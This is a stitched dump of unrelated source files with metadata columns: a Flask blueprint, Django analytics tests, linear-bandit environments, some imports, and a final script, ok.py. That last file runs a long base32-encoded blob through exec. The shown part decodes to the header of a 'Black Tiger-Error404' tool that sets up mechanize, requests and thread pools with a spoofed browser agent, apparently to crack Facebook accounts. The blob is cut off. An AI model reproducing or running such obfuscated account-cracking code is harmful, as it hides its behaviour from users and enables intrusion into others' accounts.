| 0.307692
| 0.205128
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0
| 0
| 0.315574
| 732
| 33
| 45
| 22.181818
| 0.778443
| 0
| 0
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.047619
| 0
| 0.238095
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
06ea2a537df0f61dd983409b2ea4104c96a89dea
| 166
|
py
|
Python
|
app/auth/__init__.py
|
xmedinavei/toDO-flask
|
10f226a5dfa6634d4419fc27f36de3f4f98f824b
|
[
"MIT"
] | null | null | null |
app/auth/__init__.py
|
xmedinavei/toDO-flask
|
10f226a5dfa6634d4419fc27f36de3f4f98f824b
|
[
"MIT"
] | null | null | null |
app/auth/__init__.py
|
xmedinavei/toDO-flask
|
10f226a5dfa6634d4419fc27f36de3f4f98f824b
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
# Todos los routes '/auth' serán reririgidas a este Blueprint
auth = Blueprint('auth', __name__, url_prefix='/auth')
from . import views
| 27.666667
| 61
| 0.759036
| 23
| 166
| 5.26087
| 0.695652
| 0.214876
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144578
| 166
| 6
| 62
| 27.666667
| 0.852113
| 0.355422
| 0
| 0
| 0
| 0
| 0.084906
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
660bd71e51e8d467a4e4410d141834ed011b5563
| 786
|
py
|
Python
|
web/home/tests/test_templates.py
|
RaulBSantos/maria-quiteria
|
9eb1a307099e208ce666bcc0d65be9c9a4cae150
|
[
"MIT"
] | 151
|
2019-11-10T02:18:25.000Z
|
2022-01-18T14:28:25.000Z
|
web/home/tests/test_templates.py
|
RaulBSantos/maria-quiteria
|
9eb1a307099e208ce666bcc0d65be9c9a4cae150
|
[
"MIT"
] | 202
|
2019-11-09T16:27:19.000Z
|
2022-03-22T12:41:27.000Z
|
web/home/tests/test_templates.py
|
RaulBSantos/maria-quiteria
|
9eb1a307099e208ce666bcc0d65be9c9a4cae150
|
[
"MIT"
] | 69
|
2020-02-05T01:33:35.000Z
|
2022-03-30T10:39:27.000Z
|
import pytest
class TestHome:
def test_append_google_analytics_key(self, settings, client):
settings.GOOGLE_ANALYTICS_KEY = "UA-000000000-1"
response = client.get("/")
assert "UA-000000000-1" in str(response.content)
@pytest.mark.django_db
class TestAdmin:
def test_append_google_analytics_key(self, settings, admin_client):
settings.GOOGLE_ANALYTICS_KEY = "UA-000000000-1"
response = admin_client.get("/admin/")
assert "UA-000000000-1" in str(response.content)
@pytest.mark.django_db
class TestPanel:
    def test_append_google_analytics_key(self, settings, client):
        """The configured GA key must appear in the rendered panel page."""
        tracking_id = "UA-000000000-1"
        settings.GOOGLE_ANALYTICS_KEY = tracking_id
        page = client.get("/painel/")
        assert tracking_id in str(page.content)
| 31.44
| 71
| 0.709924
| 101
| 786
| 5.306931
| 0.287129
| 0.16791
| 0.201493
| 0.106343
| 0.863806
| 0.863806
| 0.863806
| 0.863806
| 0.712687
| 0.615672
| 0
| 0.093168
| 0.180662
| 786
| 24
| 72
| 32.75
| 0.73913
| 0
| 0
| 0.555556
| 0
| 0
| 0.127226
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.166667
| false
| 0
| 0.055556
| 0
| 0.388889
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
663aa7f765dfe1fda166a04cac2440cf4d6bd00d
| 7,215
|
py
|
Python
|
rnlps/environments/linear_bandits.py
|
mlisicki/rnlps
|
2f3014c9502285ffe2340826d15185e5f8147e6f
|
[
"MIT"
] | 7
|
2019-11-27T12:11:28.000Z
|
2021-12-14T15:27:18.000Z
|
rnlps/environments/linear_bandits.py
|
mlisicki/rnlps
|
2f3014c9502285ffe2340826d15185e5f8147e6f
|
[
"MIT"
] | null | null | null |
rnlps/environments/linear_bandits.py
|
mlisicki/rnlps
|
2f3014c9502285ffe2340826d15185e5f8147e6f
|
[
"MIT"
] | 2
|
2021-02-23T19:24:59.000Z
|
2021-03-22T21:50:18.000Z
|
"""
Linear bandit environments to evaluate performance.
"""
import numpy as np
import os
class StationaryLinearBandit:
def __init__(self, n_arms, dimension, seed, arm_pool_size = 2000, err_sigma = 0.05):
self.n_arms = n_arms
self.dimension = dimension
self.arm_pool_size = arm_pool_size
self.err_sigma = err_sigma
self.random_state = np.random.RandomState(seed)
self.theta_star = self.generate_theta_star()
self.arm_pool = self.generate_arm_pool()
self.current_arms = []
self.step = 0
def generate_theta_star(self):
theta_star_unnormalized = self.random_state.uniform(low = -1, high = 1, size = (self.dimension,))
return theta_star_unnormalized/np.linalg.norm(theta_star_unnormalized)
def generate_arm_pool(self):
arm_pool_unnormalized = self.random_state.uniform(low = -1, high = 1, size = (self.arm_pool_size, self.dimension))
return arm_pool_unnormalized/np.linalg.norm(arm_pool_unnormalized, keepdims = True, axis = 1)
def sample_arms(self):
indices = self.random_state.choice(self.arm_pool_size, size = self.n_arms, replace = False)
return self.arm_pool[indices]
def reset(self):
self.step = 0
arms_context = self.sample_arms()
self.current_arms = arms_context
return arms_context
def pull(self, arm):
if (arm >= self.n_arms) or (arm < 0):
raise Exception('Invalid arm.')
expected_reward = np.dot(self.current_arms[arm], self.theta_star)
best_arm = self.best_arms()
regret = np.dot(self.current_arms[best_arm[0]] , self.theta_star) - expected_reward
reward = expected_reward + self.random_state.normal(0, self.err_sigma)
self.step += 1
context = self.sample_arms()
self.current_arms = context
return reward, context, regret
def best_arms(self):
means = np.dot(self.current_arms, self.theta_star)
return [np.argmax(means)]
def expected_cumulative_rewards(self, trial_length):
raise NotImplementedError
def __repr__(self):
r = 'StationaryLinearBandit(n_arms={0}, dimension={1}, arm_pool_size={2})'
return r.format(self.n_arms, self.dimension, self.arm_pool_size)
class FlippingLinearBandit:
def __init__(self, n_arms, dimension, half_period, seed, arm_pool_size = 2000, err_sigma = 0.05):
self.n_arms = n_arms
self.dimension = dimension
self.arm_pool_size = arm_pool_size
self.err_sigma = err_sigma
self.half_period = half_period
self.random_state = np.random.RandomState(seed)
self.theta_star = self.generate_theta_star()
self.arm_pool = self.generate_arm_pool()
self.current_arms = []
self.step = 0
def generate_theta_star(self):
theta_star_unnormalized = self.random_state.uniform(low = -1, high = 1, size = (self.dimension,))
return theta_star_unnormalized/np.linalg.norm(theta_star_unnormalized)
def generate_arm_pool(self):
arm_pool_unnormalized = self.random_state.uniform(low = -1, high = 1, size = (self.arm_pool_size, self.dimension))
return arm_pool_unnormalized/np.linalg.norm(arm_pool_unnormalized, keepdims = True, axis = 1)
def sample_arms(self):
indices = self.random_state.choice(self.arm_pool_size, size = self.n_arms, replace = False)
return self.arm_pool[indices]
def reset(self):
self.step = 0
arms_context = self.sample_arms()
self.current_arms = arms_context
return arms_context
def pull(self, arm):
if (arm >= self.n_arms) or (arm < 0):
raise Exception('Invalid arm.')
expected_reward = np.dot(self.current_arms[arm], self.theta_star)
best_arm = self.best_arms()
regret = np.dot(self.current_arms[best_arm[0]] , self.theta_star) - expected_reward
reward = expected_reward + self.random_state.normal(0, self.err_sigma)
self.step += 1
context = self.sample_arms()
# Update theta_star
if self.step % self.half_period == 0:
self.theta_star = -1 * self.theta_star
self.current_arms = context
return reward, context, regret
def best_arms(self):
means = np.dot(self.current_arms, self.theta_star)
return [np.argmax(means)]
def expected_cumulative_rewards(self, trial_length):
raise NotImplementedError
def __repr__(self):
r = 'FlippingLinearBandit(n_arms={0}, dimension={1}, half_period={2}, arm_pool_size={3})'
return r.format(self.n_arms, self.dimension, self.half_period, self.arm_pool_size)
class RotatingLinearBandit2d:
    """2-D linear bandit whose theta* rotates around the unit circle.

    theta* at step t is the unit vector at angle 2*pi*t/time_period, so the
    optimal arm drifts continuously over a full period of `time_period` steps.
    """

    def __init__(self, n_arms, time_period, seed, arm_pool_size=2000, err_sigma=0.05):
        self.n_arms = n_arms
        self.dimension = 2  # fixed: theta* lives on the 2-D unit circle
        self.arm_pool_size = arm_pool_size
        self.err_sigma = err_sigma
        self.time_period = time_period
        self.random_state = np.random.RandomState(seed)
        self.arm_pool = self.generate_arm_pool()
        self.current_arms = []
        self.step = 0
        self.theta_star = self._rotated_theta()

    def _rotated_theta(self):
        """theta* for the current step: unit vector at angle 2*pi*step/time_period."""
        angle = 2 * np.pi * self.step / self.time_period
        return np.array([np.cos(angle), np.sin(angle)])

    def generate_arm_pool(self):
        """Return a pool of candidate arm features, each row scaled to unit norm."""
        raw = self.random_state.uniform(low=-1, high=1,
                                        size=(self.arm_pool_size, self.dimension))
        return raw / np.linalg.norm(raw, keepdims=True, axis=1)

    def sample_arms(self):
        """Draw n_arms distinct feature rows from the pool."""
        picks = self.random_state.choice(self.arm_pool_size, size=self.n_arms,
                                         replace=False)
        return self.arm_pool[picks]

    def reset(self):
        """Restart the episode and return the first set of candidate arms."""
        self.step = 0
        fresh = self.sample_arms()
        self.current_arms = fresh
        return fresh

    def pull(self, arm):
        """Play `arm`; return (noisy reward, next context, instantaneous regret).

        Raises Exception if `arm` is outside [0, n_arms).
        """
        if not 0 <= arm < self.n_arms:
            raise Exception('Invalid arm.')
        expected_reward = np.dot(self.current_arms[arm], self.theta_star)
        best = self.best_arms()
        regret = np.dot(self.current_arms[best[0]], self.theta_star) - expected_reward
        reward = expected_reward + self.random_state.normal(0, self.err_sigma)
        self.step += 1
        context = self.sample_arms()
        # Advance theta* along the circle for the new step.
        self.theta_star = self._rotated_theta()
        self.current_arms = context
        return reward, context, regret

    def best_arms(self):
        """Index (singleton list) of the arm with the highest expected reward."""
        scores = np.dot(self.current_arms, self.theta_star)
        return [np.argmax(scores)]

    def expected_cumulative_rewards(self, trial_length):
        """Not defined for this environment."""
        raise NotImplementedError

    def __repr__(self):
        # Bug fix: the original formatted with self.half_period, an attribute
        # this class never sets (it stores time_period), so repr() raised
        # AttributeError.
        template = ('RotatingLinearBandit2d(n_arms={0}, dimension={1}, '
                    'time_period={2}, arm_pool_size={3})')
        return template.format(self.n_arms, self.dimension, self.time_period,
                               self.arm_pool_size)
# Registry of available linear bandit environments, keyed by class name.
linear_bandits = {
    cls.__name__: cls
    for cls in (StationaryLinearBandit, FlippingLinearBandit, RotatingLinearBandit2d)
}
| 33.714953
| 132
| 0.665419
| 970
| 7,215
| 4.673196
| 0.091753
| 0.064858
| 0.05096
| 0.039709
| 0.900507
| 0.881756
| 0.870726
| 0.870726
| 0.870726
| 0.851092
| 0
| 0.013302
| 0.228967
| 7,215
| 213
| 133
| 33.873239
| 0.801546
| 0.012197
| 0
| 0.856115
| 0
| 0
| 0.047237
| 0.020245
| 0
| 0
| 0
| 0
| 0
| 1
| 0.18705
| false
| 0
| 0.014388
| 0
| 0.366906
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9ff0aca83804512c03c04980017d6265c8816030
| 131
|
py
|
Python
|
api/resources_portal/views/__init__.py
|
arielsvn/resources-portal
|
f5a25935e45ceb05e2f4738f567eec9ca8793441
|
[
"BSD-3-Clause"
] | null | null | null |
api/resources_portal/views/__init__.py
|
arielsvn/resources-portal
|
f5a25935e45ceb05e2f4738f567eec9ca8793441
|
[
"BSD-3-Clause"
] | null | null | null |
api/resources_portal/views/__init__.py
|
arielsvn/resources-portal
|
f5a25935e45ceb05e2f4738f567eec9ca8793441
|
[
"BSD-3-Clause"
] | null | null | null |
from resources_portal.views.material import MaterialViewSet
from resources_portal.views.user import UserCreateViewSet, UserViewSet
| 43.666667
| 70
| 0.89313
| 15
| 131
| 7.666667
| 0.666667
| 0.226087
| 0.330435
| 0.417391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068702
| 131
| 2
| 71
| 65.5
| 0.942623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b05e582a216b447e231253fed1db510081302010
| 76
|
py
|
Python
|
jmatcher/search/admin.py
|
jamesaud/se1-group4
|
5280b13dff33e72ce717318a8dd78a06cd6effb3
|
[
"MIT"
] | 1
|
2021-09-09T15:43:09.000Z
|
2021-09-09T15:43:09.000Z
|
jmatcher/usermessages/admin.py
|
jamesaud/se1-group4
|
5280b13dff33e72ce717318a8dd78a06cd6effb3
|
[
"MIT"
] | null | null | null |
jmatcher/usermessages/admin.py
|
jamesaud/se1-group4
|
5280b13dff33e72ce717318a8dd78a06cd6effb3
|
[
"MIT"
] | null | null | null |
from django.contrib.admin import AdminSite
from django.contrib import admin
| 25.333333
| 42
| 0.855263
| 11
| 76
| 5.909091
| 0.545455
| 0.307692
| 0.523077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 76
| 2
| 43
| 38
| 0.955882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c672107f6b872e6d58ad3030fed3b17c0bea1c1d
| 40,712
|
py
|
Python
|
ok.py
|
BlackTiger-Error404/Black
|
463866d5e3be390fc6019a4ec45d2a772ca71866
|
[
"Apache-2.0"
] | 2
|
2021-06-01T08:00:23.000Z
|
2021-08-16T06:42:11.000Z
|
ok.py
|
BlackTiger-Error404/Black
|
463866d5e3be390fc6019a4ec45d2a772ca71866
|
[
"Apache-2.0"
] | null | null | null |
ok.py
|
BlackTiger-Error404/Black
|
463866d5e3be390fc6019a4ec45d2a772ca71866
|
[
"Apache-2.0"
] | 1
|
2020-11-09T17:08:16.000Z
|
2020-11-09T17:08:16.000Z
|
import base64
exec(base64.b32decode('EMQS65LTOIXWE2LOF5YHS5DIN5XDEDIKENRW6ZDJNZTT25LUMYWTQDIKENBGYYLDNNKGSZ3FOIWUK4TSN5ZDIMBUBUFCGV3IMF2HGYLQOAQCWOJSGMYDGNZTGM2TCMJUBUFCGWLPOVKHKYTFHJKGS3LFGQQFS33VBUFGS3LQN5ZHIIDPOMWHG6LTFR2GS3LFFRSGC5DFORUW2ZJMOJQW4ZDPNUWGQYLTNBWGSYRMOJSSY5DIOJSWCZDJNZTSY2TTN5XCY5LSNRWGSYRMMNXW623JMVWGSYRMOJSXC5LFON2HGLDNMVRWQYLONF5GKDIKMZZG63JANV2WY5DJOBZG6Y3FONZWS3THFZYG633MEBUW24DPOJ2CAVDIOJSWCZCQN5XWYDIKMZZG63JAOJSXC5LFON2HGLTFPBRWK4DUNFXW44ZANFWXA33SOQQEG33ONZSWG5DJN5XEK4TSN5ZA2CTGOJXW2IDNMVRWQYLONF5GKIDJNVYG64TUEBBHE33XONSXEDIKBUFA2CTSMVWG6YLEFBZXS4ZJBUFHG6LTFZZWK5DEMVTGC5LMORSW4Y3PMRUW4ZZIE52XIZRYE4UQ2CTCOIQD2IDNMVRWQYLONF5GKLSCOJXXO43FOIUCSDIKMJZC443FORPWQYLOMRWGKX3SN5RG65DTFBDGC3DTMUUQ2CTCOIXHGZLUL5UGC3TENRSV64TFMZZGK43IFBWWKY3IMFXGS6TFFZPWQ5DUOAXEQVCUKBJGKZTSMVZWQUDSN5RWK43TN5ZCQKJMNVQXQX3UNFWWKPJRFEGQUYTSFZQWIZDIMVQWIZLSOMQD2IC3FATVK43FOIWUCZ3FNZ2COLBAE5HXAZLSMEXTSLRYGAQCQQLOMRZG62LEHMQE64DFOJQSATLJNZUS6MZSFYYC4MRSGU2C6OBVFYQFKOZANFSCSICQOJSXG5DPF4ZC4MJSFY2DEMZAKZSXE43JN5XC6MJSFYYTMJZJLUGQUDIKBUFGIZLGEBVWK3DVMFZCQKJ2BUFAS4DSNFXHIIBCLQYDGM23GE5TSNTNLMQV2IC4PAYWEWZRHM4TC3KFPBUXIIQNBIEW64ZOON4XGLTFPBUXIKBJBUFA2CQNBJSGKZRAMFRWC2ZIMIUTUDIKEAQCAIDXEA6SAJ3BNB2GI6TKMMTQ2CRAEAQCAZBAHUQCOJYNBIQCAIBAMZXXEIDJEBUW4IDYHIGQUIBAEAQCAIBAEBSCAKZ5EATSCJZLO5NXEYLOMRXW2LTSMFXGI2LOOQUDALDMMVXCQ5ZJFUYSSXJLNEGQUIBAEAQHEZLUOVZG4IDDMV2GC2ZIMQUQ2CQNBIGQUZDFMYQGGZLUMFVSQYRJHIGQUIBAEAQHOIB5EATWC2DUMR5GUYZHBUFCAIBAEBTG64RANEQGS3RAO45A2CRAEAQCAIBAEAQGUIB5EB3S42LOMRSXQKDJFEGQUIBAEAQCAIBAEB4D2IDYFZZGK4DMMFRWKKBHEESXGJZFNEWCOXBQGMZVWJLTHMYW2JZFON2HEKBTGEVWUKJJBUFCAIBAEB4CAKZ5EATVYMBTGNNTA3JHBUFCAIBAEB4CAPJAPAXHEZLQNRQWGZJIE4QTAJZME5ODAMZTLMYG2JZJBUFCAIBAEBZXS4ZOON2GI33VOQXHO4TJORSSQ6BLE5OG4JZJBUFA2CQNBJSGKZRANJQWYYLOFB5CSOQNBIEWM33SEBSSA2LOEB5CAKZAE5OG4JZ2BUFASCLTPFZS443UMRXXK5BOO5ZGS5DFFBSSSDIKBEEXG6LTFZZXIZDPOV2C4ZTMOVZWQKBJBUFASCLUNFWWKLTTNRSWK4BIGAYDAMBQFYYSSDIKBUFA2CRDEMRSGICMJ5DU6IBDEMRSGDIKNRXWO3ZAHUQCEIRCBUFFYMBTGNNTCOZZGFW6FFVWEAQCAIBAFQQCAIBMBUFFYMBTGNNTCOZZGJW6FFVWEAQCAIBAE
AQCAIBAEASCYIBAEQWCAIBAEAQCYDIKLQYDGM23GE5TSM3N4KLLMIBAEAQCAIBAEAQCAIBKONZS4JDTOMXCALTTE4GQUXBQGMZVWMJ3HE2G3YUWWYQCAIBMEAQCAIBAFZZXGJBEEQSCIJBEEQSCI4ZMBUFFYMBTGNNTCOZZGVW6FFVWEAQCAIBEFYQHGJBEEQSCIJBEEQSCIJBEEQSGAJBEKNZQ2CS4GAZTGWZRHM4TM3PCS23CAIBAEAVCIJBEEQSCIJBEEQSCIJBEEQSCIJBEN4SCIJBAEAQCAIBAEAWA2CS4GAZTGWZRHM4TO3PCS23CAIBAOMSCIJBEEQSCIJBEEQSCIJBEEQSCIJBEEQSCIJBEOMWCAIBMOMGQUXBQGMZVWMJ3HE3G3YUWWYQCA4ZEEQSCIJBEEQSCIKREEQSCIJBEFIVCUKREEQSCIJBEFISCIJBEEQWA2CS4GAZTGWZRHM4TK3PCS23CA4ZEEQSCIJBEEQSCIJDTFIVCIJBEERZXG43TONZSUJBEEQSCIJBEEQVA2CS4GAZTGWZRHM4TO3PCS23CA4ZEEQSCIJBEEQSCIJBHEAQCAIBAEAQCAIDAFIVCU43TFISCUJDTFIVA2CS4GAZTGWZRHM4TI3PCS23CA4ZEEQSCIJBEEQSCIJBMEAQCAIBAEAQCAIBAEAQCAIDAFIVCUKRAEAQCALTTEQSHGDIKLQYDGM23GE5TSM3N4KLLMIDTEQSCIJBEEQSCIJBEEQSHGLBOFYXCAIBAEAQCAIBAEAQCAIBAEAQCAIBEEQTSAIANBJODAMZTLMYTWOJSNXRJNNRAONZSIJBEEQSCIJBEEQSCIJBEEQSCIJBEEQSCGIZDENZS4IBAEAQCALREEQVCIJBEEAQCADIKLQYDGM23GE5TSMLN4KLLMIBKFIVCIJBEEQSCIJBEEQSCIJBEEQSCIJBEEQSCGIZDEMQCIJBEEQSCIKRAEAQCAIBEEQSCIDIKLQYDGM23GE5TSM3N4KLLMIBAEAQCAKREEQSCIJBEEQSCIJBEEQSCIJBEEQSCIJBEEMRSGI3TFIVCAIBAEAQC4JBEBUFFYMBTGNNTCOZZGRW6FFVWEAQCAIBAEAVCIJBEEQSCIJBEEQSCIJBEEQSCIJBEEQSCIJBEEQRSG4ZAEAQCALREEQSCIJANBJODAMZTLMYTWOJVNXRJNNRAEAQCAIBAEQSCUKREEQSCIJBEEQSCIJBEEQSCIJBEEQSCIJBEEQSCIJBEEQSCIKRAEAQA2CS4GAZTGWZRHM4TE3PCS23CAIBAEAQCIJBKEAQCUJBKEQSCIJBEEQSCIJBEEQSCIJBEEQSCIJBEKMVCUKRKE4GQUXBQGMZVWMJ3HE3G3YUWWYQCAIBAEAWCUIBAEAQCAJZAEASCIJBEEQSCIJBEEQSCIJBEEQSCGIZDENZQ2CS4GAZTGWZRHM4TO3PCS23CAJBOEAQCAIBAEAQCAIBAFZZSIJBEEQSCIJBEEQSCIJBEEQSCIJBDEMRSGKQNBJODAMZTLMYTWOJWNXRJNNRAFISHGLRAEAQC4LTTONJSIJBEEQSCIJBEEQSCIJBEEQSCIJBEEQRSGIZDFIGQUXBQGMZVWMJ3HE2W3YUWWYQCALREEQSFGJBEEQSCIJBEEQSCIJBEEQSCIJBEEQSCIJBEEQSCGIZDEMRSUDIKLQYDGM23GE5TSNDNYKVS2LJNFUWS2LJNFVODAMZTLMYTWOJRNUQEE3DBMNVVI2LHMVZC2RLSOJXXENBQGQQFYMBTGNNTCOZZGVWS2LJNFUWS2LJNFUWS2LJNFUWS2LOCXMGQUXBQGMZVWMJ3HEZG3YUWW3RJNB7CS2D6FFUH4KLIPYUWQ7RJNB7CS2D6FFUH4KLIPYUWQ7RJNB7CS2D6FFUH4KLIPYUWQ7RJNB7CS2D6FFUH4KLIPYUWQ7RJNB7CS2D6FFUH4KLIPYUXQAGQUXBQGMZVWMB3GMYW3YUVVXRJLEHCSWIOFFMQ4
KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZAIHQT6JIADIK4KMJXYUYTNODAMZTLMYTWOJUNUQEC5LUNBXXEIB5LQYDGM23GE5TSMTN4KLLMICCNRQWG22UNFTWK4RNIVZHE33SGQYDIDIK4KMJXYUYTNODAMZTLMYTWOJTNVMW65LUOVRGKIB5LQYDGM23GE5TSM3N4KLLMICUNFWWKNBALFXXKDIK4KMJXYUYTNODAMZTLMYTWOJSNVLWQYLUONQXA4B5LQYDGM23GE5TSNDN4KLLMIBLHEZDGMBTG4ZTGNJRGE2A2CS4GAZTGWZQHMZTC3PCSWYOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEBA6CPZFAANBJODAMZTLMYTWOJSNXRJNNXCS2D6FFUH4KLIPYUWQ7RJNB7CS2D6FFUH4KLIPYUWQ7RJNB7CS2D6FFUH4KLIPYUWQ7RJNB7CS2D6FFUH4KLIPYUWQ7RJNB7CS2D6FFUH4KLIPYUWQ7RJPABCEIRA2CQNBJSGKZRAORUWWKBJHIGQUCLUNF2GS2ZAHUQFWJZOEAQCAJZME4XC4IBAE4WCOLROFYQCOXINBIEWM33SEBXSA2LOEB2GS5DJNM5A2CQJBFYHE2LOOQUCEXDSLQYDGM23GE5TSNTNIJWGCY3LKRUWOZLS4KLIRYUWRDRJNCHCS2EOFFUI4KLIRYUWRDRJNCHCS2EOFFUI4KLIRYUWSLRJNEXCS2JOFFUSFYXDSOJFLR4DCYS3GE5TSN3NEIVW6KJMHNZXS4ZOON2GI33VOQXGM3DVONUCQKJ3ORUW2ZJOONWGKZLQFAYSSDIKBUFA2CTCMFRWWIB5EAYA2CTCMVZGQYLTNFWCAPJALNOQ2CTDMVVXA33JNZ2CAPJALNOQ2CTPNNZSAPJALNOQ2CTJMQQD2IC3LUGQU3DJON2GO4TVOAQD2IC3LUGQU5TVNRXG65BAHUQCEXBQGMZVWMZRNVHG65BAKZ2WY3RCBUFHM5LMNYQD2IBCLQYDGM23GMZG2VTVNRXCEDIKBUFG64ZOON4XG5DFNUUCEY3MMVQXEIRJBUFA2CTQOJUW45BAEARCEIQNBJODAMZTLMYDWOJYNUQOFGU24KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KNJUIBCEIRA2CTKMFWGC3RIE5ODAMZTLMYDWOJRNXRJTI7CS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCTGRSOKJABUFGUYLMMFXCQJ24GAZTGWZQHM4TK3JA4KALZ35YR4QOFFUI4KLIRYUWRDRJNCHCS2EOFFUI4KLJFYUWSLRJNEXCS2JOFFUS4KK2YMRQEXRJLLHCQC6O7OEPE4USADIKNJQWYYLOFATVYMBTGNNTAOZZGJW6FGND4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWR
HRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KM2GJZJBUFGUYLMMFXCQJ24GAZTGWZQHM4TI3JA4KALZ35YR4QOFFUI4KLIRYUWRDRJNCHCS2EOFFUI4KLIRYUWRDRJNEXCS2JOFFUS4KLJFYUWSLRJNEXCSWWDIMBF4KK2YJZJBUFGUYLMMFXCQJ24GAZTGWZQHM4TC3PCTGR6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FGNDE4USADIKNJQWYYLOFATVYMBTGNNTAOZZGZWSBYUAXTX3RDZA4KLIRYUWRDRJNCHCS2EOFFUI4KLIRYUWRDRJNCHCS2EOFFUI4KLIRYUWSLRJNEXCS2JOFFUS4KLJFYUWSLRJLLBWGAS6FFNMEATSSIANBJVGC3DBNYUCOXBQGMZVWMB3HE2G3YUZUPRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJTIZHFEQA2CTKMFWGC3RIE5ODAMZTLMYDWOJTNUQOFAF4564I6IHCS2EOFFUI4KLIRYUWRDRJNCHCS2EOFFUI4KLIRYUWRDRJNCHCS2EOFFUI4KLIRYUWRDRJNEXCS2JOFFUS4KLJFYUWSLRJNEXCS2JOFFNMHAYCLYUVVQTSSIANBJVGC3DBNYUCOXBQGMZVWMB3HE2W3YUZUPRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJNCPCS2E6FFUJ4KLITYUWRHRJTIZHFEQA2CTKMFWGC3RIE5ODAMZTLMYDWOJXNUQOFAF4564I6IHCS2EOFFUI4KLIRYUWRDRJNCHCS2EOFFUI4KLIRYUWRDRJNCHCS2